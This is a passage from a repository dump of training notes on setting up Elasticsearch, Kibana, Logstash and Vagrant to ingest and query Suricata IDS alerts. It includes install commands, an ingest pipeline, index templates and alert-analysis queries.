28 | logs: /var/log/elasticsearch 29 | ``` 30 | -------------------------------------------------------------------------------- /common/elastic/elastic.ingest.md: -------------------------------------------------------------------------------- 1 | # Elasticsearch Ingest node 2 | 3 | * https://www.elastic.co/guide/en/elasticsearch/reference/master/ingest.html 4 | * https://www.elastic.co/guide/en/elasticsearch/reference/master/ingest-processors.html 5 | * https://www.elastic.co/guide/en/elasticsearch/plugins/master/ingest.html 6 | 7 | 8 | ``` 9 | /usr/share/elasticsearch/bin/elasticsearch-plugin install ingest-geoip 10 | ``` 11 | 12 | ``` 13 | { 14 | "description": "Enrich Suricata logs with GeoIP", 15 | "processors": [ 16 | { 17 | "geoip" : { "field": "src_ip", "target_field": "src_geoip" } 18 | }, 19 | { 20 | "geoip" : { "field": "dest_ip", "target_field": "dest_geoip" } 21 | } 22 | ] 23 | } 24 | ``` 25 | 26 | ``` 27 | curl 
-XPUT localhost:9200/_ingest/pipeline/suricata -d @suricata_pipe.json 28 | ``` 29 | -------------------------------------------------------------------------------- /common/elastic/elastic.install.md: -------------------------------------------------------------------------------- 1 | # install elasticsearch 2 | 3 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/_installation.html 4 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/deb.html 5 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html 6 | 7 | ## install java 8 8 | 9 | ### openjdk (only for testing) 10 | ``` 11 | apt-get -y install openjdk-8-jre-headless 12 | ``` 13 | 14 | ### oracle java 15 | ``` 16 | install_oracle_java() { 17 | echo "Installing oracle Java" 18 | echo 'oracle-java8-installer shared/accepted-oracle-license-v1-1 boolean true' | debconf-set-selections \ 19 | && add-apt-repository ppa:webupd8team/java \ 20 | && apt-get update > /dev/null \ 21 | && apt-get -y install oracle-java8-installer > /dev/null 22 | } 23 | ``` 24 | 25 | ## deb package 26 | ```bash 27 | ELASTICSEARCH="elasticsearch-6.1.2.deb" 28 | 29 | [[ -f $ELASTICSEARCH ]] || wget -4 https://artifacts.elastic.co/downloads/elasticsearch/$ELASTICSEARCH 30 | dpkg -i $ELASTICSEARCH 31 | systemctl enable elasticsearch 32 | systemctl start elasticsearch 33 | ``` 34 | 35 | ## test it 36 | 37 | ``` 38 | curl -ss -XGET localhost:9200 39 | curl -ss -XGET localhost:9200/_cat/nodes 40 | curl -ss -XGET localhost:9200/_cat/indices 41 | curl -ss -XGET localhost:9200/_cat/shards 42 | ``` 43 | 44 | ---- 45 | next -> [configure basic node](elastic.config.basic.md) 46 | -------------------------------------------------------------------------------- /common/elastic/elastic.mappings.md: -------------------------------------------------------------------------------- 1 | # Fixing mappings 2 | 3 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping.html 4 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-types.html 5 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-templates.html 6 | * https://raw.githubusercontent.com/markuskont/salt-elasticsearch/master/salt/elasticsearch/etc/elasticsearch/template/suricata.json 7 | * https://www.elastic.co/blog/strings-are-dead-long-live-strings 8 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/multi-fields.html 9 | 10 | ## Templates 11 | 12 | ``` 13 | curl -XGET localhost:9200/_template 14 | ``` 15 | 16 | ``` 17 | { 18 | "order": 0, 19 | "version": 60001, 20 | "index_patterns": [ 21 | "*" 22 | ], 23 | "settings": { 24 | "index": { 25 | "refresh_interval" : "30s", 26 | "number_of_shards" : 3, 27 | "number_of_replicas" : 0 28 | } 29 | }, 30 | "mappings": { 31 | "_default_": { 32 | "dynamic_templates": [ 33 | { 34 | "message_field": { 35 | "path_match": "message", 36 | "match_mapping_type": "string", 37 | "mapping": { 38 | "type": "text", 39 | "norms": false 40 | } 41 | } 42 | }, 43 | { 44 | "string_fields": { 45 | "match": "*", 46 | "match_mapping_type": "string", 47 | "mapping": { 48 | "type": "text", 49 | "norms": false, 50 | "fields": { 51 | "keyword": { 52 | "type": "keyword", 53 | "ignore_above": 256 54 | } 55 | } 56 | } 57 | } 58 | } 59 | ], 60 | "properties": { 61 | "@timestamp": { 62 | "type": "date" 63 | }, 64 | "@version": { 65 | "type": "keyword" 66 | }, 67 | "geoip": { 68 | "dynamic": true, 69 | "properties": { 70 | "ip": { 71 | "type": "ip" 72 | }, 73 | "location": { 74 | 
"type": "geo_point" 75 | }, 76 | "latitude": { 77 | "type": "half_float" 78 | }, 79 | "longitude": { 80 | "type": "half_float" 81 | } 82 | } 83 | } 84 | } 85 | } 86 | }, 87 | "aliases": {} 88 | } 89 | ``` 90 | 91 | ``` 92 | curl -ss -XPUT localhost:9200/_template/default -d @/vagrant/elastic-default-template.json -H'Content-Type: application/json' 93 | ``` 94 | 95 | ## check for mappings 96 | 97 | ``` 98 | curl -ss -XGET localhost:9200/index-timestamp/_mappings 99 | ``` 100 | 101 | ## Reindex and update_by_query API 102 | 103 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html 104 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/tasks.html 105 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-update-by-query.html 106 | -------------------------------------------------------------------------------- /common/elastic/kibana.install.md: -------------------------------------------------------------------------------- 1 | # install kibana 2 | 3 | * https://www.elastic.co/guide/en/kibana/current/deb.html 4 | * https://www.elastic.co/guide/en/kibana/current/_configuring_kibana_on_docker.html 5 | 6 | ## deb package 7 | 8 | ```bash 9 | KIBANA="kibana-6.1.2-amd64.deb" 10 | [[ -f $KIBANA ]] || wget $WGET_PARAMS https://artifacts.elastic.co/downloads/kibana/$KIBANA -O $KIBANA 11 | dpkg -s kibana || dpkg -i $KIBANA > /dev/null 2>&1 12 | 13 | systemctl stop kibana.service 14 | systemctl start kibana.service 15 | 16 | FILE=/etc/kibana/kibana.yml 17 | grep "provisioned" $FILE || cat >> $FILE < [visualize](https://www.elastic.co/guide/en/kibana/current/visualize.html) -> [dashboard](https://www.elastic.co/guide/en/kibana/current/dashboard.html) 6 | * [console](https://www.elastic.co/guide/en/kibana/current/console-kibana.html) -> [query](https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl.html) -> [Aggregate](https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations.html) -> [script](/Suricata/suricata/elaScripting.md) 7 | 8 | ## API queries 9 | 10 | ``` 11 | GET suricata-exercise/_search 12 | { 13 | "size": 1, 14 | "query": { 15 | "bool": { 16 | "must": [ 17 | {"term": { 18 | "event_type": { 19 | "value": "alert" 20 | } 21 | }} 22 | ] 23 | } 24 | } 25 | } 26 | ``` 27 | 28 | ``` 29 | GET suricata-exercise/_search 30 | { 31 | "size": 0, 32 | "query": { 33 | "bool": { 34 | "must": [ 35 | { 36 | "terms": { 37 | "event_type.keyword": [ 38 | "alert" 39 | ] 40 | } 41 | } 42 | ] 43 | } 44 | }, 45 | "aggs": { 46 | "tsBucketing": { 47 | "date_histogram": { 48 | "field": "timestamp", 49 | "interval": "hour" 50 | }, 51 | "aggs": { 52 | "alerts": { 53 | "terms": { 54 | "field": "alert.category.keyword", 55 | "size": 15 56 | } 57 | } 58 | } 59 | } 60 | } 61 | } 62 | ``` 63 | 64 | ``` 65 | { 66 | "size": 0, 67 | "query": { 68 | "bool": { 69 | "must": [ 70 | { 71 | "term": { 72 | "event_type": { 73 | "value": "alert" 74 | } 75 | } 76 | }, 77 | { 78 | "term": { 79 | "alert.severity": { 80 | "value": 1 81 | } 82 | } 83 | }, 84 | { 85 | "wildcard": { 86 | "alert.category.keyword": { 87 | "value": "*Web*" 88 | } 89 | } 90 | } 91 | ], 92 | "must_not": [ 93 | { 94 | "term": { 95 | "src_geoip.country_iso_code.keyword": { 96 | "value": "EE" 97 | } 98 | } 99 | } 100 | ] 101 | } 102 | }, 103 | "aggs": { 104 | "signatures": { 105 | "terms": { 106 | "field": "alert.signature.keyword", 107 | "size": 25 108 | } 109 | } 110 | } 111 | } 112 | ``` 113 | 114 | ## tasks 115 | 116 | * Find top signatures per category. 
117 | * Which alerts are boring? Apply filter. 118 | * Find interesting content in web application alerts. What prompted those alerts? 119 | * Draw a timeline of attack campaign 120 | -------------------------------------------------------------------------------- /common/elastic/logstash-redis-ela.conf: -------------------------------------------------------------------------------- 1 | input { 2 | redis { 3 | data_type => "list" 4 | host => "redis" 5 | port => 6379 6 | key => "suricata" 7 | tags => ["suricata", "CDMCS", "fromredis"] 8 | } 9 | } 10 | filter { 11 | json { 12 | source => "message" 13 | } 14 | if 'syslog' not in [tags] { 15 | mutate { remove_field => [ "message", "Hostname" ] } 16 | } 17 | } 18 | output { 19 | elasticsearch { 20 | hosts => ["elasticsearch"] 21 | index => "logstash-bigindex" 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /common/vagrant/README.md: -------------------------------------------------------------------------------- 1 | # Vagrant 2 | 3 | * https://github.com/mitchellh/vagrant#vagrant 4 | * https://www.vagrantup.com/docs/why-vagrant/ 5 | * http://slides.com/hillar/vagrant#/ 6 | 7 | ## Vagrant is 8 | * a tool for building complete development environments. 9 | * is a tool for building and distributing development environments. 10 | * an automation tool with a domain-specific language (DSL) that is used to automate the creation of VMs and VM environments. 11 | 12 | ## Install 13 | 14 | * https://www.vagrantup.com/downloads.html 15 | 16 | Please install the latest version from vagrant providers. Package from debian/ubuntu package repos will be out of date and bad things may happen. 17 | 18 | ``` 19 | VAGRANT='' 20 | WGET_OPTS='-q -4' 21 | 22 | wget $WGET_OPTS https://releases.hashicorp.com/vagrant/$VAGRANT/vagrant_$VAGRANT_x86_64.deb 23 | dpkg -i vagrant_$VAGRANT_x86_64.deb 24 | ``` 25 | 26 | ## Getting started 27 | 28 | * https://www.vagrantup.com/docs/getting-started/ 29 | * [prepare](https://www.vagrantup.com/docs/getting-started/project_setup.html) 30 | * [up & ssh](https://www.vagrantup.com/docs/getting-started/up.html) 31 | * [destroy](https://www.vagrantup.com/docs/getting-started/teardown.html) 32 | * [automated provisioning](https://www.vagrantup.com/docs/getting-started/provisioning.html) 33 | * [boxes](https://www.vagrantup.com/docs/getting-started/boxes.html) 34 | 35 | Vagrant is a ruby wrapper/library which allows virtual machines to be automatically deployed for development. Deployment parameters would be stored in local `Vagrantfile`. Provisioning scripts and configuration management tools can be invoked upon first `vagrant up` or subsequent `vagrant provision` commands to automatically deploy and configure software inside the virtual machine. 36 | 37 | ``` 38 | $SHELL = <